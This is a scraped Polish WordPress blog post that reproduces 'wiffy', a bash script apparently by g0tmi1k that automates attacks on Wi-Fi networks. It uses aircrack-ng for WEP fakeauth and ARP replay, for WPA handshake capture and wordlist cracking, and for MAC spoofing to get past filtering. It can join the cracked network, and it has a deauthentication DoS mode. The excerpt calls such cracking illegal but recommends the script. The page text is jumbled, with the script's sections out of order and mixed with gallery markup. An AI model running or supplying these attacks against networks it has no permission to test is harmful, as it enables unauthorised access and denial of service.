\"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0002.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 